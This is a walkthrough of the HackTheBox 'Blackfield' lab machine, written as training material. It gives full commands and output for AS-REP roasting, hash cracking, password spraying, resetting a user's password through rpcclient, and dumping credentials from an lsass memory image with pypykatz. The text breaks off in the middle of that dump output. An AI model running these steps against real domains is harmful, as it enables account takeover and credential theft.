In this walk through, we will be going through the Blackfield room from HackTheBox. This room is rated as Hard on the platform and it consists of exploitation of Windows and Active Directory misconfigurations to get initial access. For privilge escalation, Backup Operators group privilege was abused to get SYSTEM. So, let’s get started without any delay.
Table of Contents
Machine Info:
Title | Blackfield |
IPaddress | 10.10.10.192 |
Difficulty | Hard |
OS | Windows |
Description | Backfield is a hard difficulty Windows machine featuring Windows and Active Directory misconfigurations. |
Enumeration:
- I started with my regular aggressive nmap scan and found multiple ports opened. The highlights were – port 88 (Kerberos) indicating that we are dealing with an Active Directory environment here. Along with that, port 139 and 445 (SMB) and 389 (LDAP).
$ sudo nmap -A 10.10.10.192 [sudo] password for wh1terose: Starting Nmap 7.80 ( https://nmap.org ) at 2023-12-14 11:11 IST Nmap scan report for 10.10.10.192 Host is up (0.21s latency). Not shown: 993 filtered ports PORT STATE SERVICE VERSION 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-12-14 12:41:41Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port OS fingerprint not ideal because: Missing a closed TCP port so results incomplete No OS matches for host Network Distance: 2 hops Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: 6h59m59s | smb2-security-mode: | 2.02: |_ Message signing enabled and required | smb2-time: | date: 2023-12-14T12:42:01 |_ start_date: N/A TRACEROUTE (using port 135/tcp) HOP RTT ADDRESS 1 207.26 ms 10.10.14.1 2 208.09 ms 10.10.10.192 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 94.83 seconds
- As per the nmap results, found out the domain name is – BLACKFIELD.local. So, added it in my /etc/hosts file.
- Tried to enumerate some usernames using RCP and LDAP services however found no luck.
smbclient -L 10.10.10.192
- Next, pivoted to SMB enumeration and found an interesting share – profile$
- Peeked inside the profile share and found a number of potential usernames. Saved it to my local machine in a file called usernames.txt
$ smbclient //10.10.10.192/profiles$ Password for [WORKGROUP\wh1terose]: Try "help" to get a list of possible commands. smb: \> ls . D 0 Wed Jun 3 22:17:12 2020 .. D 0 Wed Jun 3 22:17:12 2020 AAlleni D 0 Wed Jun 3 22:17:11 2020 ABarteski D 0 Wed Jun 3 22:17:11 2020 ABekesz D 0 Wed Jun 3 22:17:11 2020 ABenzies D 0 Wed Jun 3 22:17:11 2020 ABiemiller D 0 Wed Jun 3 22:17:11 2020 AChampken D 0 Wed Jun 3 22:17:11 2020 ACheretei D 0 Wed Jun 3 22:17:11 2020 ACsonaki D 0 Wed Jun 3 22:17:11 2020 -- snipped --
$ cat usernames.txt AAlleni ABarteski ABekesz ABenzies ABiemiller AChampken ACheretei ACsonaki AHigchens AJaquemai AKlado AKoffenburger AKollolli AKruppe AKubale ALamerz --- snipped --
Performing AS-REProasting attack
- With our captured usernames, i tried to perform AS-REP roasting on them to check if we can get a TGT for one of the accounts which has Kerberos Pre-Authentication disabled. Got a hit for – support.
python3 ~/Tools/impacket/examples/GetNPUsers.py -no-pass -usersfile usernames.txt -dc-ip 10.10.10.192 'BLACKFIELD.LOCAL/' Impacket v0.10.1.dev1+20220720.103933.3c6713e3 - Copyright 2022 SecureAuth Corporation [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) -- snipped -- [email protected]:4a9e0763e700c5be596a5dd120f6962c$709b4e186f3a9b346052cc0f14286ba73dfc155327e9cea337bdcd0ef47f1fd54b13578d868209a171fc76c29220607db8182bbfdd1c479291578a21cc1ccf556f3f79c0cae6ce1951f765af242649261a87bf262e6b3e56ccc40e35a15f980d2469e968429c51a54e616d37e9fea4ed0430b38cb5e5c16c82151876029a816cdff290a0204f5348ce7c47dd6e3eeefead7839ed7cdd2f713bc56b1e086069e0475b7cb885582331c48e275c4a16145382a014306221f39dcf60ac071318ce6280452bf628288395f339d6c983469177547227464a44a9816ce4851310123453dde56b9c1e0aeeb8db9530586cad4614a6f5fca8 -- snipped --
- Cracked the captured hash using hashcat and found the password for the user – #00^BlackKnight.
hashcat -m 18200 hash.txt rockyou.txt -O
support: #00^BlackKnight
- Next, i sprayed the password onto the domain to check if it is valid and got a green flag in crackmapexec output.
crackmapexec smb 10.10.10.192 -u support -p '#00^BlackKnight'
- Tried to get a shell using WinRM however was unable to to so.
- I also tried to perform a password spray with the found password on the usernames in the usernames.txt. Got a hit for AAlleni but still wasn’t able to get a shell with that.
crackmapexec smb 10.10.10.192 -u usernames.txt -p '#00^BlackKnight'
- Next, checked the SMB shares accessible to user support. I have got an interesting one there called Forensic but we do not have permissions to access it yet.
smbmap -H 10.10.10.192 -u support -p '#00^BlackKnight' [+] Finding open SMB ports.... [+] User SMB session established on 10.10.10.192... [+] IP: 10.10.10.192:445 Name: BLACKFIELD.local Disk Permissions Comment ---- ----------- ------- ADMIN$ NO ACCESS Remote Admin C$ NO ACCESS Default share forensic NO ACCESS Forensic / Audit share. -- snipped --
- I also added the DC01.blackfield.local to my /etc/hosts file in order to avoid any host resolution issues later.
Enumeration with Bloodhound.py
- I got bumped into a dead end for a while here. Next, i tried using Bloodhound.py script with the creds we have and queried the DC via LDAP to gather some information out of it.
$ bloodhound-python -c all -u support -p '#00^BlackKnight' -d blackfield.local -gc blackfield.local -dc DC01.blackfield.local INFO: Getting TGT for user INFO: Connecting to LDAP server: DC01.blackfield.local INFO: Kerberos auth to LDAP failed, trying NTLM INFO: Found 1 domains INFO: Found 1 domains in the forest INFO: Found 18 computers INFO: Connecting to LDAP server: DC01.blackfield.local INFO: Kerberos auth to LDAP failed, trying NTLM INFO: Found 316 users INFO: Found 52 groups INFO: Found 2 gpos INFO: Found 1 ous INFO: Found 19 containers INFO: Found 0 trusts -- snipped --
- Got a bunch of json files containing the queried information.
- Uploaded the files to Bloodhound and performed the analysis. When i looked into the permissions and access the user support has, i found an interesting permission set – First Degree Object Control. With this permissions, i am able to change password for user Audit2020 and thus get access to the concerned account.
Exploiting First Degree Object Control
- Next, i used rpcclient to change the password of user audit2020 and checked the changes by spraying it on to the DC using crackmapexec. Found a positive result for it that means we are good to go.
$ rpcclient -U 'blackfield.local/support%#00^BlackKnight' 10.10.10.192 rpcclient $> setuserinfo2 audit2020 23 Password123 rpcclient $> exit
- Now i checked the shares for user audit2020 and was able to read the contents of the Forensic share.
$ smbmap -H 10.10.10.192 -u audit2020 -p 'Password123' [+] Finding open SMB ports.... [+] User SMB session established on 10.10.10.192... [+] IP: 10.10.10.192:445 Name: blackfield.local Disk Permissions Comment ---- ----------- ------- ADMIN$ NO ACCESS Remote Admin C$ NO ACCESS Default share . dr--r--r-- 0 Sun Feb 23 20:40:16 2020 . dr--r--r-- 0 Sun Feb 23 20:40:16 2020 .. dr--r--r-- 0 Sun Feb 23 23:44:37 2020 commands_output dr--r--r-- 0 Fri May 29 01:59:24 2020 memory_analysis dr--r--r-- 0 Sat Feb 29 04:00:34 2020 tools forensic READ ONLY Forensic / Audit share.
- Accessed the share using smbclient and found bunch of files that contains some tools. Downloaded the files that look interesting on to my local system.
$ smbclient //10.10.10.192/Forensic / Audit share --user audit2020 --password 'Password123' Try "help" to get a list of possible commands. smb: \> ls . D 0 Sun Feb 23 18:33:16 2020 .. D 0 Sun Feb 23 18:33:16 2020 commands_output D 0 Sun Feb 23 23:44:37 2020 memory_analysis D 0 Fri May 29 01:58:33 2020 tools D 0 Sun Feb 23 19:09:08 2020 5102079 blocks of size 4096. 1691114 blocks available smb: \> cd commands_ouput cd \commands_ouput\: NT_STATUS_OBJECT_NAME_NOT_FOUND smb: \> cd commands_output smb: \commands_output\> ls . D 0 Sun Feb 23 23:44:37 2020 .. D 0 Sun Feb 23 23:44:37 2020 domain_admins.txt A 528 Sun Feb 23 18:30:19 2020 domain_groups.txt A 962 Sun Feb 23 18:21:52 2020 domain_users.txt A 16454 Sat Feb 29 04:02:17 2020 firewall_rules.txt A 518202 Sun Feb 23 18:23:58 2020 ipconfig.txt A 1782 Sun Feb 23 18:20:28 2020 netstat.txt A 3842 Sun Feb 23 18:21:01 2020 route.txt A 3976 Sun Feb 23 18:23:01 2020 systeminfo.txt A 4550 Sun Feb 23 18:26:59 2020 tasklist.txt A 9990 Sun Feb 23 18:24:29 2020 5102079 blocks of size 4096. 1691114 blocks available smb: \commands_output\> cd .. smb: \> cd memory_analysis smb: \memory_analysis\> ls . D 0 Fri May 29 01:58:33 2020 .. D 0 Fri May 29 01:58:33 2020 conhost.zip A 37876530 Fri May 29 01:55:36 2020 ctfmon.zip A 24962333 Fri May 29 01:55:45 2020 dfsrs.zip A 23993305 Fri May 29 01:55:54 2020 dllhost.zip A 18366396 Fri May 29 01:56:04 2020 ismserv.zip A 8810157 Fri May 29 01:56:13 2020 lsass.zip A 41936098 Fri May 29 01:55:08 2020 mmc.zip A 64288607 Fri May 29 01:55:25 2020 RuntimeBroker.zip A 13332174 Fri May 29 01:56:24 2020 ServerManager.zip A 131983313 Fri May 29 01:56:49 2020 sihost.zip A 33141744 Fri May 29 01:57:00 2020 smartscreen.zip A 33756344 Fri May 29 01:57:11 2020 svchost.zip A 14408833 Fri May 29 01:57:19 2020 taskhostw.zip A 34631412 Fri May 29 01:57:30 2020 winlogon.zip A 14255089 Fri May 29 01:57:38 2020 wlms.zip A 4067425 Fri May 29 01:57:44 2020 WmiPrvSE.zip A 18303252 Fri May 29 01:57:53 2020 5102079 blocks of size 4096. 1691114 blocks available smb: \memory_analysis\> cd .. smb: \> cd tools smb: \tools\> ls . D 0 Sun Feb 23 19:09:08 2020 .. D 0 Sun Feb 23 19:09:08 2020 sleuthkit-4.8.0-win32 D 0 Sun Feb 23 19:09:03 2020 sysinternals D 0 Sun Feb 23 19:05:25 2020 volatility D 0 Sun Feb 23 19:05:39 2020 5102079 blocks of size 4096. 1691114 blocks available
smb: \commands_output\> prompt off smb: \commands_output\> recurse on smb: \commands_output\> mget * getting file \commands_output\domain_admins.txt of size 528 as domain_admins.txt (0.6 KiloBytes/sec) (average 0.6 KiloBytes/sec) getting file \commands_output\domain_groups.txt of size 962 as domain_groups.txt (1.1 KiloBytes/sec) (average 0.9 KiloBytes/sec) getting file \commands_output\domain_users.txt of size 16454 as domain_users.txt (18.9 KiloBytes/sec) (average 6.9 KiloBytes/sec) getting file \commands_output\firewall_rules.txt of size 518202 as firewall_rules.txt (292.3 KiloBytes/sec) (average 122.5 KiloBytes/sec) getting file \commands_output\ipconfig.txt of size 1782 as ipconfig.txt (2.1 KiloBytes/sec) (average 102.7 KiloBytes/sec) getting file \commands_output\netstat.txt of size 3842 as netstat.txt (4.4 KiloBytes/sec) (average 88.8 KiloBytes/sec) getting file \commands_output\route.txt of size 3976 as route.txt (4.5 KiloBytes/sec) (average 78.1 KiloBytes/sec) getting file \commands_output\systeminfo.txt of size 4550 as systeminfo.txt (5.3 KiloBytes/sec) (average 70.2 KiloBytes/sec) getting file \commands_output\tasklist.txt of size 9990 as tasklist.txt (11.4 KiloBytes/sec) (average 64.3 KiloBytes/sec)
- Looked into one of the files which looked interesting – domain_admins.txt and found out that the a user Ipwn3dYourCompany is also an a Domain Admin.
- Next interesting file i found was lsass.zip file. This caught my eye because the lsass process holds some credentials in it in the Windows realm. So we might get lucky with this too. After unzipping the file, found a file named called lsass.DMP which is a dump file for the lsass process.
unzip lsass.zip
- Used the pypykatz tool to retrieve information from the dump and found some interesting information along with the NTLM hash of user svc_backup and Administrator.
$ pypykatz lsa minidump lsass.DMP INFO:pypykatz:Parsing file lsass.DMP FILE: ======== lsass.DMP ======= == LogonSession == authentication_id 406458 (633ba) session_id 2 username svc_backup domainname BLACKFIELD logon_server DC01 logon_time 2020-02-23T18:00:03.423728+00:00 sid S-1-5-21-4194615774-2175524697-3563712290-1413 luid 406458 == MSV == Username: svc_backup Domain: BLACKFIELD LM: NA NT: 9658d1d1dcd9250115e2205d9f48400d SHA1: 463c13a9a31fc3252c68ba0a44f0221626a33e5c DPAPI: a03cd8e9d30171f3cfe8caad92fef621 == WDIGEST [633ba]== username svc_backup domainname BLACKFIELD password None password (hex) == Kerberos == Username: svc_backup Domain: BLACKFIELD.LOCAL == WDIGEST [633ba]== username svc_backup domainname BLACKFIELD password None password (hex) == LogonSession == authentication_id 365835 (5950b) session_id 2 username UMFD-2 domainname Font Driver Host logon_server logon_time 2020-02-23T17:59:38.218491+00:00 sid S-1-5-96-0-2 luid 365835 == MSV == Username: DC01$ Domain: BLACKFIELD LM: NA NT: b624dc83a27cc29da11d9bf25efea796 SHA1: 4f2a203784d655bb3eda54ebe0cfdabe93d4a37d DPAPI: NA == WDIGEST [5950b]== username DC01$ domainname BLACKFIELD password None password (hex) == Kerberos == Username: DC01$ Domain: BLACKFIELD.local Password: &SYVE+<ynu`Ql;gvEE!f$DoO0F+,gP@P`fra`z4&G3K'mH:&'K^SW$FNWWx7J-N$^'bzB1Duc3^Ez]En kh`b'YSV7Ml#@G3@*(b$]j%#L^[Q`nCP'<Vb0I6 password (hex)260053005900560045002b003c0079006e007500600051006c003b00670076004500450021006600240044006f004f00300046002b002c006700500040005000600066007200610060007a0034002600470033004b0027006d0048003a00260027004b005e0053005700240046004e0057005700780037004a002d004e0024005e00270062007a004200310044007500630033005e0045007a005d0045006e0020006b00680060006200270059005300560037004d006c00230040004700330040002a002800620024005d006a00250023004c005e005b00510060006e004300500027003c0056006200300049003600 == WDIGEST [5950b]== username DC01$ domainname BLACKFIELD password None password (hex) == LogonSession == authentication_id 365493 (593b5) session_id 2 username UMFD-2 domainname Font Driver Host logon_server logon_time 2020-02-23T17:59:38.200147+00:00 sid S-1-5-96-0-2 luid 365493 == MSV == Username: DC01$ Domain: BLACKFIELD LM: NA NT: b624dc83a27cc29da11d9bf25efea796 SHA1: 4f2a203784d655bb3eda54ebe0cfdabe93d4a37d DPAPI: NA == WDIGEST [593b5]== username DC01$ domainname BLACKFIELD password None password (hex) == Kerberos == Username: DC01$ Domain: BLACKFIELD.local Password: &SYVE+<ynu`Ql;gvEE!f$DoO0F+,gP@P`fra`z4&G3K'mH:&'K^SW$FNWWx7J-N$^'bzB1Duc3^Ez]En kh`b'YSV7Ml#@G3@*(b$]j%#L^[Q`nCP'<Vb0I6 password (hex)260053005900560045002b003c0079006e007500600051006c003b00670076004500450021006600240044006f004f00300046002b002c006700500040005000600066007200610060007a0034002600470033004b0027006d0048003a00260027004b005e0053005700240046004e0057005700780037004a002d004e0024005e00270062007a004200310044007500630033005e0045007a005d0045006e0020006b00680060006200270059005300560037004d006c00230040004700330040002a002800620024005d006a00250023004c005e005b00510060006e004300500027003c0056006200300049003600 == WDIGEST [593b5]== username DC01$ domainname BLACKFIELD password None password (hex) == LogonSession == authentication_id 257142 (3ec76) session_id 0 username DC01$ domainname BLACKFIELD logon_server logon_time 2020-02-23T17:59:13.318909+00:00 sid S-1-5-18 luid 257142 == Kerberos == Username: DC01$ Domain: BLACKFIELD.LOCAL == LogonSession == authentication_id 153705 (25869) session_id 1 username Administrator domainname BLACKFIELD logon_server DC01 logon_time 2020-02-23T17:59:04.506080+00:00 sid S-1-5-21-4194615774-2175524697-3563712290-500 luid 153705 == MSV == Username: Administrator Domain: BLACKFIELD LM: NA NT: 7f1e4ff8c6a8e6b6fcae2d9c0572cd62 SHA1: db5c89a961644f0978b4b69a4d2a2239d7886368 DPAPI: 240339f898b6ac4ce3f34702e4a89550 == WDIGEST [25869]== username Administrator domainname BLACKFIELD password None password (hex) == Kerberos == Username: Administrator Domain: BLACKFIELD.LOCAL == WDIGEST [25869]== username Administrator domainname BLACKFIELD password None password (hex) == DPAPI [25869]== luid 153705 key_guid d1f69692-cfdc-4a80-959e-bab79c9c327e masterkey 769c45bf7ceb3c0e28fb78f2e355f7072873930b3c1d3aef0e04ecbb3eaf16aa946e553007259bf307eb740f222decadd996ed660ffe648b0440d84cd97bf5a5 sha1_masterkey d04452f8459a46460939ced67b971bcf27cb2fb9 == LogonSession == authentication_id 137110 (21796) session_id 0 username DC01$ domainname BLACKFIELD logon_server logon_time 2020-02-23T17:58:27.068590+00:00 sid S-1-5-18 luid 137110 == Kerberos == Username: DC01$ Domain: BLACKFIELD.LOCAL == LogonSession == authentication_id 134695 (20e27) session_id 0 username DC01$ domainname BLACKFIELD logon_server logon_time 2020-02-23T17:58:26.678019+00:00 sid S-1-5-18 luid 134695 == Kerberos == Username: DC01$ Domain: BLACKFIELD.LOCAL == LogonSession == authentication_id 40310 (9d76) session_id 1 username DWM-1 domainname Window Manager logon_server logon_time 2020-02-23T17:57:46.897202+00:00 sid S-1-5-90-0-1 luid 40310 == MSV == Username: DC01$ Domain: BLACKFIELD LM: NA NT: b624dc83a27cc29da11d9bf25efea796 SHA1: 4f2a203784d655bb3eda54ebe0cfdabe93d4a37d DPAPI: NA == WDIGEST [9d76]== username DC01$ domainname BLACKFIELD password None password (hex) == Kerberos == Username: DC01$ Domain: BLACKFIELD.local Password: &SYVE+<ynu`Ql;gvEE!f$DoO0F+,gP@P`fra`z4&G3K'mH:&'K^SW$FNWWx7J-N$^'bzB1Duc3^Ez]En kh`b'YSV7Ml#@G3@*(b$]j%#L^[Q`nCP'<Vb0I6 password (hex)260053005900560045002b003c0079006e007500600051006c003b00670076004500450021006600240044006f004f00300046002b002c006700500040005000600066007200610060007a0034002600470033004b0027006d0048003a00260027004b005e0053005700240046004e0057005700780037004a002d004e0024005e00270062007a004200310044007500630033005e0045007a005d0045006e0020006b00680060006200270059005300560037004d006c00230040004700330040002a002800620024005d006a00250023004c005e005b00510060006e004300500027003c0056006200300049003600 == WDIGEST [9d76]== username DC01$ domainname BLACKFIELD password None password (hex) == LogonSession == authentication_id 40232 (9d28) session_id 1 username DWM-1 domainname Window Manager logon_server logon_time 2020-02-23T17:57:46.897202+00:00 sid S-1-5-90-0-1 luid 40232 == MSV == Username: DC01$ Domain: BLACKFIELD LM: NA NT: b624dc83a27cc29da11d9bf25efea796 SHA1: 4f2a203784d655bb3eda54ebe0cfdabe93d4a37d DPAPI: NA == WDIGEST [9d28]== username DC01$ domainname BLACKFIELD password None password (hex) == Kerberos == Username: DC01$ Domain: BLACKFIELD.local Password: &SYVE+<ynu`Ql;gvEE!f$DoO0F+,gP@P`fra`z4&G3K'mH:&'K^SW$FNWWx7J-N$^'bzB1Duc3^Ez]En kh`b'YSV7Ml#@G3@*(b$]j%#L^[Q`nCP'<Vb0I6 password (hex)260053005900560045002b003c0079006e007500600051006c003b00670076004500450021006600240044006f004f00300046002b002c006700500040005000600066007200610060007a0034002600470033004b0027006d0048003a00260027004b005e0053005700240046004e0057005700780037004a002d004e0024005e00270062007a004200310044007500630033005e0045007a005d0045006e0020006b00680060006200270059005300560037004d006c00230040004700330040002a002800620024005d006a00250023004c005e005b00510060006e004300500027003c0056006200300049003600 == WDIGEST [9d28]== username DC01$ domainname BLACKFIELD password None password (hex) == LogonSession == authentication_id 996 (3e4) session_id 0 username DC01$ domainname BLACKFIELD logon_server logon_time 2020-02-23T17:57:46.725846+00:00 sid S-1-5-20 luid 996 == MSV == Username: DC01$ Domain: BLACKFIELD LM: NA NT: b624dc83a27cc29da11d9bf25efea796 SHA1: 4f2a203784d655bb3eda54ebe0cfdabe93d4a37d DPAPI: NA == WDIGEST [3e4]== username DC01$ domainname BLACKFIELD password None password (hex) == Kerberos == Username: dc01$ Domain: BLACKFIELD.local Password: &SYVE+<ynu`Ql;gvEE!f$DoO0F+,gP@P`fra`z4&G3K'mH:&'K^SW$FNWWx7J-N$^'bzB1Duc3^Ez]En kh`b'YSV7Ml#@G3@*(b$]j%#L^[Q`nCP'<Vb0I6 password (hex)260053005900560045002b003c0079006e007500600051006c003b00670076004500450021006600240044006f004f00300046002b002c006700500040005000600066007200610060007a0034002600470033004b0027006d0048003a00260027004b005e0053005700240046004e0057005700780037004a002d004e0024005e00270062007a004200310044007500630033005e0045007a005d0045006e0020006b00680060006200270059005300560037004d006c00230040004700330040002a002800620024005d006a00250023004c005e005b00510060006e004300500027003c0056006200300049003600 == WDIGEST [3e4]== username DC01$ domainname BLACKFIELD password None password (hex) == LogonSession == authentication_id 24410 (5f5a) session_id 1 username UMFD-1 domainname Font Driver Host logon_server logon_time 2020-02-23T17:57:46.569111+00:00 sid S-1-5-96-0-1 luid 24410 == MSV == Username: DC01$ Domain: BLACKFIELD LM: NA NT: b624dc83a27cc29da11d9bf25efea796 SHA1: 4f2a203784d655bb3eda54ebe0cfdabe93d4a37d DPAPI: NA == WDIGEST [5f5a]== username DC01$ domainname BLACKFIELD password None password (hex) == Kerberos == Username: DC01$ Domain: BLACKFIELD.local Password: &SYVE+<ynu`Ql;gvEE!f$DoO0F+,gP@P`fra`z4&G3K'mH:&'K^SW$FNWWx7J-N$^'bzB1Duc3^Ez]En kh`b'YSV7Ml#@G3@*(b$]j%#L^[Q`nCP'<Vb0I6 password (hex)260053005900560045002b003c0079006e007500600051006c003b00670076004500450021006600240044006f004f00300046002b002c006700500040005000600066007200610060007a0034002600470033004b0027006d0048003a00260027004b005e0053005700240046004e0057005700780037004a002d004e0024005e00270062007a004200310044007500630033005e0045007a005d0045006e0020006b00680060006200270059005300560037004d006c00230040004700330040002a002800620024005d006a00250023004c005e005b00510060006e004300500027003c0056006200300049003600 == WDIGEST [5f5a]== username DC01$ domainname BLACKFIELD password None password (hex) == LogonSession == authentication_id 406499 (633e3) session_id 2 username svc_backup domainname BLACKFIELD logon_server DC01 logon_time 2020-02-23T18:00:03.423728+00:00 sid S-1-5-21-4194615774-2175524697-3563712290-1413 luid 406499 == MSV == Username: svc_backup Domain: BLACKFIELD LM: NA NT: 9658d1d1dcd9250115e2205d9f48400d SHA1: 463c13a9a31fc3252c68ba0a44f0221626a33e5c DPAPI: a03cd8e9d30171f3cfe8caad92fef621 == WDIGEST [633e3]== username svc_backup domainname BLACKFIELD password None password (hex) == Kerberos == Username: svc_backup Domain: BLACKFIELD.LOCAL == WDIGEST [633e3]== username svc_backup domainname BLACKFIELD password None password (hex) == DPAPI [633e3]== luid 406499 key_guid 836e8326-d136-4b9f-94c7-3353c4e45770 masterkey 0ab34d5f8cb6ae5ec44a4cb49ff60c8afdf0b465deb9436eebc2fcb1999d5841496c3ffe892b0a6fed6742b1e13a5aab322b6ea50effab71514f3dbeac025bdf sha1_masterkey 6efc8aa0abb1f2c19e101fbd9bebfb0979c4a991 == LogonSession == authentication_id 366665 (59849) session_id 2 username DWM-2 domainname Window Manager logon_server logon_time 2020-02-23T17:59:38.293877+00:00 sid S-1-5-90-0-2 luid 366665 == MSV == Username: DC01$ Domain: BLACKFIELD LM: NA NT: b624dc83a27cc29da11d9bf25efea796 SHA1: 4f2a203784d655bb3eda54ebe0cfdabe93d4a37d DPAPI: NA == WDIGEST [59849]== username DC01$ domainname BLACKFIELD password None password (hex) == Kerberos == Username: DC01$ Domain: BLACKFIELD.local Password: &SYVE+<ynu`Ql;gvEE!f$DoO0F+,gP@P`fra`z4&G3K'mH:&'K^SW$FNWWx7J-N$^'bzB1Duc3^Ez]En kh`b'YSV7Ml#@G3@*(b$]j%#L^[Q`nCP'<Vb0I6 password (hex)260053005900560045002b003c0079006e007500600051006c003b00670076004500450021006600240044006f004f00300046002b002c006700500040005000600066007200610060007a0034002600470033004b0027006d0048003a00260027004b005e0053005700240046004e0057005700780037004a002d004e0024005e00270062007a004200310044007500630033005e0045007a005d0045006e0020006b00680060006200270059005300560037004d006c00230040004700330040002a002800620024005d006a00250023004c005e005b00510060006e004300500027003c0056006200300049003600 == WDIGEST [59849]== username DC01$ domainname BLACKFIELD password None password (hex) == LogonSession == authentication_id 366649 (59839) session_id 2 username DWM-2 domainname Window Manager logon_server logon_time 2020-02-23T17:59:38.293877+00:00 sid S-1-5-90-0-2 luid 366649 == MSV == Username: DC01$ Domain: BLACKFIELD LM: NA NT: b624dc83a27cc29da11d9bf25efea796 SHA1: 4f2a203784d655bb3eda54ebe0cfdabe93d4a37d DPAPI: NA == WDIGEST [59839]== username DC01$ domainname BLACKFIELD password None password (hex) == Kerberos == Username: DC01$ Domain: BLACKFIELD.local Password: &SYVE+<ynu`Ql;gvEE!f$DoO0F+,gP@P`fra`z4&G3K'mH:&'K^SW$FNWWx7J-N$^'bzB1Duc3^Ez]En kh`b'YSV7Ml#@G3@*(b$]j%#L^[Q`nCP'<Vb0I6 password (hex)260053005900560045002b003c0079006e007500600051006c003b00670076004500450021006600240044006f004f00300046002b002c006700500040005000600066007200610060007a0034002600470033004b0027006d0048003a00260027004b005e0053005700240046004e0057005700780037004a002d004e0024005e00270062007a004200310044007500630033005e0045007a005d0045006e0020006b00680060006200270059005300560037004d006c00230040004700330040002a002800620024005d006a00250023004c005e005b00510060006e004300500027003c0056006200300049003600 == WDIGEST [59839]== username DC01$ domainname BLACKFIELD password None password (hex) == LogonSession == authentication_id 256940 (3ebac) session_id 0 username DC01$ domainname BLACKFIELD logon_server logon_time 2020-02-23T17:59:13.068835+00:00 sid S-1-5-18 luid 256940 == Kerberos == Username: DC01$ Domain: BLACKFIELD.LOCAL == LogonSession == authentication_id 136764 (2163c) session_id 0 username DC01$ domainname BLACKFIELD logon_server logon_time 2020-02-23T17:58:27.052945+00:00 sid S-1-5-18 luid 136764 == Kerberos == Username: DC01$ Domain: BLACKFIELD.LOCAL == LogonSession == authentication_id 134935 (20f17) session_id 0 username DC01$ domainname BLACKFIELD logon_server logon_time 2020-02-23T17:58:26.834285+00:00 sid S-1-5-18 luid 134935 == Kerberos == Username: DC01$ Domain: BLACKFIELD.LOCAL == LogonSession == authentication_id 997 (3e5) session_id 0 username LOCAL SERVICE domainname NT AUTHORITY logon_server logon_time 2020-02-23T17:57:47.162285+00:00 sid S-1-5-19 luid 997 == Kerberos == Username: Domain: == LogonSession == authentication_id 24405 (5f55) session_id 0 username UMFD-0 domainname Font Driver Host logon_server logon_time 2020-02-23T17:57:46.569111+00:00 sid S-1-5-96-0-0 luid 24405 == MSV == Username: DC01$ Domain: BLACKFIELD LM: NA NT: b624dc83a27cc29da11d9bf25efea796 SHA1: 4f2a203784d655bb3eda54ebe0cfdabe93d4a37d DPAPI: NA == WDIGEST [5f55]== username DC01$ domainname BLACKFIELD password None password (hex) == Kerberos == Username: DC01$ Domain: BLACKFIELD.local Password: &SYVE+<ynu`Ql;gvEE!f$DoO0F+,gP@P`fra`z4&G3K'mH:&'K^SW$FNWWx7J-N$^'bzB1Duc3^Ez]En kh`b'YSV7Ml#@G3@*(b$]j%#L^[Q`nCP'<Vb0I6 password (hex)260053005900560045002b003c0079006e007500600051006c003b00670076004500450021006600240044006f004f00300046002b002c006700500040005000600066007200610060007a0034002600470033004b0027006d0048003a00260027004b005e0053005700240046004e0057005700780037004a002d004e0024005e00270062007a004200310044007500630033005e0045007a005d0045006e0020006b00680060006200270059005300560037004d006c00230040004700330040002a002800620024005d006a00250023004c005e005b00510060006e004300500027003c0056006200300049003600 == WDIGEST [5f55]== username DC01$ domainname BLACKFIELD password None password (hex) == LogonSession == authentication_id 24294 (5ee6) session_id 0 username UMFD-0 domainname Font Driver Host logon_server logon_time 2020-02-23T17:57:46.554117+00:00 sid S-1-5-96-0-0 luid 24294 == MSV == Username: DC01$ Domain: BLACKFIELD LM: NA NT: b624dc83a27cc29da11d9bf25efea796 SHA1: 4f2a203784d655bb3eda54ebe0cfdabe93d4a37d DPAPI: NA == WDIGEST [5ee6]== username DC01$ domainname BLACKFIELD password None password (hex) == Kerberos == Username: DC01$ Domain: BLACKFIELD.local Password: &SYVE+<ynu`Ql;gvEE!f$DoO0F+,gP@P`fra`z4&G3K'mH:&'K^SW$FNWWx7J-N$^'bzB1Duc3^Ez]En kh`b'YSV7Ml#@G3@*(b$]j%#L^[Q`nCP'<Vb0I6 password (hex)260053005900560045002b003c0079006e007500600051006c003b00670076004500450021006600240044006f004f00300046002b002c006700500040005000600066007200610060007a0034002600470033004b0027006d0048003a00260027004b005e0053005700240046004e0057005700780037004a002d004e0024005e00270062007a004200310044007500630033005e0045007a005d0045006e0020006b00680060006200270059005300560037004d006c00230040004700330040002a002800620024005d006a00250023004c005e005b00510060006e004300500027003c0056006200300049003600 == WDIGEST [5ee6]== username DC01$ domainname BLACKFIELD password None password (hex) == LogonSession == authentication_id 24282 (5eda) session_id 1 username UMFD-1 domainname Font Driver Host logon_server logon_time 2020-02-23T17:57:46.554117+00:00 sid S-1-5-96-0-1 luid 24282 == MSV == Username: DC01$ Domain: BLACKFIELD LM: NA NT: b624dc83a27cc29da11d9bf25efea796 SHA1: 4f2a203784d655bb3eda54ebe0cfdabe93d4a37d DPAPI: NA == WDIGEST [5eda]== username DC01$ domainname BLACKFIELD password None password (hex) == Kerberos == Username: DC01$ Domain: BLACKFIELD.local Password: 